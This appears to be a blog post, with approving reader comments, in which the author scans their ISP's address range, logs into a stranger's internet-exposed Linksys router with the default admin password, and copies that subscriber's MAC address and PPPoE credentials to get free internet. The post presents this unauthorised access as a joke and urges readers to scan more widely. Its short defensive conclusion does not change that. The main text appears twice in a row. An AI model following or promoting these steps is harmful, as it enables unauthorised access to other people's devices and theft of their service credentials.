This post is about how I could hack my ISP subscribers to get free Internet so if you are not interested then you can get back to your work :)
*Let's start*
From last few days I have been participating in bug bounty programs but I got bored and tired of testing web applications so I decided to leave bug hunting for a while and started to play with my router's configurations then I saw a option named "Remote Web Management". It allows users to access and manage their router from Internet.
I was wondered why do we even need this feature?
And what is it's use since IP addresses are assigned dynamically (unless you are rich enough to get a static IP address)?
So I thought there could be some router's which may have this option enabled by default and also there's a chance that one would enable this option unknowingly or knowingly (static IP address people ,remember ?).
And fortunately some thug people don't even bother to change their default password of router web interface and some router don't even provide an option to change the password of web interface. #ultra_thug_life
So I thought to look for such routers in my ISP network.
I have DSL Broadband Internet connection so each user is provided with a username and password to connect to Internet via PPPOE .
And the server only checks MAC address, username and password before establishing the connection. In other words if you can get users MAC, username and password you can login to their PPPOE account to connect to Internet.
So first thing I did was I went to my router's status page and checked the internet connection information
Ok! Here WAN IP address is 172.x.x.10 which was a public IP address (class B).
So we can now conclude that after successful authentication, ISP is allowing my router to establish P2P connection to IP 172.x.x.10.
In short ISP is assigning my router a public IP address 172.x.x.10 which can be accessed over Internet and that means anyone can access my router over Internet by IP address 172.x.x.10 if I enabled remote web management feature.
Now next thing I had to do is find out IP addresses block range owned by my ISP.
So our old friend "whois" is agreed to help me with it.
According to "whois" my ISP owns Ip addresses block range 172.x.x.0-172.x.x.255 .
Now next thing that I need to do is to find out all IP addresses in this range having 80 and 8080 open port.
This time our old friend "nmap" is agreed to help me with it.
Note : I just scanned small range of IP address from ISP range to get results faster , you can scan whole range of IP owned by ISP to get more results
Here I got 3 IP addresses with open ports 80 and 8080
So I opened all IP addresses in browser :
http://172.x.x.84:8080
http://172.x.x.129
http://127.x.x.228
One of them was Surveillance Camera, one showed just a blank html page and one was a Router - http://172.x.x.84:8080
It was a Linksys Router , I tried my luck with very hard to guess password "admin" and you guessed it right. I was in.
Always remember "admin":"admin" and "admin":BLANK PASSWORD never fails in such situations.
Now what?
Obviously I went to status page of that router and copied the MAC address and PPPOE credentials (username and password) .
Then I simply put those information into my router and I got connection to internet ;)
I did speed test to check the speed :
Note : If a user is already connected to Internet then you can't use their credential to connect to Internet. You can't establish two connections using single account.
Conclusion:
-Think before you enable "Remote Web Management" feature in your router
-Always change default password of your router
-Never assign same passwords to all users (for ISP)
Thanks
*Let's start*
From last few days I have been participating in bug bounty programs but I got bored and tired of testing web applications so I decided to leave bug hunting for a while and started to play with my router's configurations then I saw a option named "Remote Web Management". It allows users to access and manage their router from Internet.
I was wondered why do we even need this feature?
And what is it's use since IP addresses are assigned dynamically (unless you are rich enough to get a static IP address)?
So I thought there could be some router's which may have this option enabled by default and also there's a chance that one would enable this option unknowingly or knowingly (static IP address people ,remember ?).
And fortunately some thug people don't even bother to change their default password of router web interface and some router don't even provide an option to change the password of web interface. #ultra_thug_life
So I thought to look for such routers in my ISP network.
I have DSL Broadband Internet connection so each user is provided with a username and password to connect to Internet via PPPOE .
And the server only checks MAC address, username and password before establishing the connection. In other words if you can get users MAC, username and password you can login to their PPPOE account to connect to Internet.
So first thing I did was I went to my router's status page and checked the internet connection information
Ok! Here WAN IP address is 172.x.x.10 which was a public IP address (class B).
So we can now conclude that after successful authentication, ISP is allowing my router to establish P2P connection to IP 172.x.x.10.
In short ISP is assigning my router a public IP address 172.x.x.10 which can be accessed over Internet and that means anyone can access my router over Internet by IP address 172.x.x.10 if I enabled remote web management feature.
Now next thing I had to do is find out IP addresses block range owned by my ISP.
So our old friend "whois" is agreed to help me with it.
According to "whois" my ISP owns Ip addresses block range 172.x.x.0-172.x.x.255 .
Now next thing that I need to do is to find out all IP addresses in this range having 80 and 8080 open port.
This time our old friend "nmap" is agreed to help me with it.
Note : I just scanned small range of IP address from ISP range to get results faster , you can scan whole range of IP owned by ISP to get more results
Here I got 3 IP addresses with open ports 80 and 8080
So I opened all IP addresses in browser :
http://172.x.x.84:8080
http://172.x.x.129
http://127.x.x.228
One of them was Surveillance Camera, one showed just a blank html page and one was a Router - http://172.x.x.84:8080
It was a Linksys Router , I tried my luck with very hard to guess password "admin" and you guessed it right. I was in.
Always remember "admin":"admin" and "admin":BLANK PASSWORD never fails in such situations.
Now what?
Obviously I went to status page of that router and copied the MAC address and PPPOE credentials (username and password) .
Then I simply put those information into my router and I got connection to internet ;)
I did speed test to check the speed :
Note : If a user is already connected to Internet then you can't use their credential to connect to Internet. You can't establish two connections using single account.
Conclusion:
-Think before you enable "Remote Web Management" feature in your router
-Always change default password of your router
-Never assign same passwords to all users (for ISP)
Thanks
Very good read. 👍
ReplyDeleteyaaa did this same before.... nice one blog
ReplyDeleteThanks bro! :D
ReplyDelete